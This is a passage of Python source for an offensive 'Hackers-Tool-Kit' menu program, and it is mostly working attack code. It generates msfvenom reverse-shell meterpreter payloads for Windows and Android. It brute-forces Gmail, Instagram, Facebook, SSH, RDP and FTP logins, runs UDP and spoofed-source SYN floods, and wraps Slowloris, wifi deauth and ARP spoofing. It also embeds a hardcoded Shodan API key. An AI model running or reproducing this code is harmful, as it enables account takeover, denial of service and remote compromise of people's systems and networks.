: Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", 